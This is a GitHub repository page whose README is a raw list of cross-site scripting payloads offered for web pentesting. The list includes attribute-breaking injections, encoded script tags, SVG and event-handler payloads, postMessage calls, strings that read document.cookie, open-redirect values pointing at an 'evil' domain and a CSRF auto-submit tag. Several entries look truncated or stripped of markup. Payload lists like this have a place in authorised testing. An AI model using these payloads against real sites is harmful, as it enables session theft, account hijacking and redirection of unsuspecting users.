https://github.com/mustafa-kum/xss-payloads
Xss-Payloads
https://github.com/mustafa-kum/xss-payloads
web-pentest xss xss-vulnerability
Xss-Payloads
- Host: GitHub
- URL: https://github.com/mustafa-kum/xss-payloads
- Owner: Mustafa-Kum
- Created: 2023-01-06T11:32:02.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2023-01-11T11:44:18.000Z (over 2 years ago)
- Last Synced: 2025-01-25T22:23:16.820Z (4 months ago)
- Topics: web-pentest, xss, xss-vulnerability
- Homepage: https://github.com/Mustafa-Kum/XSS-Payloads
- Size: 9.77 KB
- Stars: 2
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# XSS-Payloads
```javascript
Inner XSS
document.getElementsByTag('body')[0].innerHTML = `
`
target[.]com/?redirect_to=evil[.]com
JavaScript XSS
");alert('xss');
')alert('xss');
javas%09cript:alert(1)
" onmouseover="alert(document['cookie'])">
" onfocus="alert(document['cookie'])" autofocus">
';alert(1);'
var token='';alert(1);''
alert(1);
var token=alert(1);';
>alert(1);
">
test
'+alert(1)+'
"onmouseover="alert(1)
http://"onmouseover="alert(1)
%09onmousover=alert(1)
%3f%09onmousover=alert(1)
%3f%09onmousover=alert(document.location.hash.substring(1))#{XSS} ---> Console ---> document.location.hash
asd";}catch(e){}alert(document.cookie);try{XSS="
lookhere’);});
Target[.]com/?s=”>alert(1)&s=”>alert(1)
'"> {{1*1}}
/?utm_source=%60%2balert/**/(1)%2b%60
/?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3ealert('XSS')<\/script>
aaa"bbb'ccc<svg onload=alert('XSS')>eee
<svg onload="alert('XSS on '+ document.domain)">
</title>
">
alert(1);//
"'> </form><script>alert("XSS");
'> alert("XSS");
javascript://%0a%0dalert(document.cookie)
*/alert('XSS\n-XSS'); //
''> alert("XSS");
'">prompt(/XSS/)
'"> prompt(/XSS/)
data:,\u0077indow.top.alert(1)
">ipt>alert(1)
onmouseover=alert'(document.domain)'
/
alert ("XSS");
/OnLoad="`${prompt"}`">
<--`
%20--!>
(_=alert,_(1337)) "">
';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'
redirect_to=////evil%E3%80%82com
"/>alert("Xss:Priyanshu")
"/>alert(/XSS/)
"
"><%2Fstyle<%2Fscript>confirm("XSS")<%2Fscript>
<body onload=document.getElementById("xsrf").submit()>
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(1)>">X</a
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(document.cookie)>">X</a
http://test.com<script>alert(document.domain)
http://test.comalert(document.cookie)
x">
q=" onclick="alert(/XSS/)
">
">alert(document.cookie)
alert('xss')
/default.aspx#">
/default.aspx#">
by ">
“>
.txt.jpg
“>
">
">alert('XSS')
id=abc">alert(/xss/)
">
Default.aspx/" onmouseout="confirm(1)'x="
toString=\u0061lert;window+''
”/><script>alert(1)</script>”/>
\">
Click Here=></iframe>
/error3?msg=30&data=';alert('xss');//
/omni_success?cmdb_edit_path=");alert('xss');//
Console
window.postMessage('alert(document.domain','*')
window.postMessage({"action": "exec", "payload": "alert(document.domain)"}, '*')
{{{alert(1)
javascript:/*-->
alert("XSS")"\>
http://example.com/search?q=%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
http://example.com/search?q=alert(%00'XSS')
http://example.com/search?q^alert('XSS')
http://example.com/search?q=%3Cscript%3Ealert(%00'XSS')%3C%2Fscript%3E
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
https://www.bugcrowd.com/blog/the-ultimate-guide-to-finding-and-escalating-xss-bugs/
">]
">]
```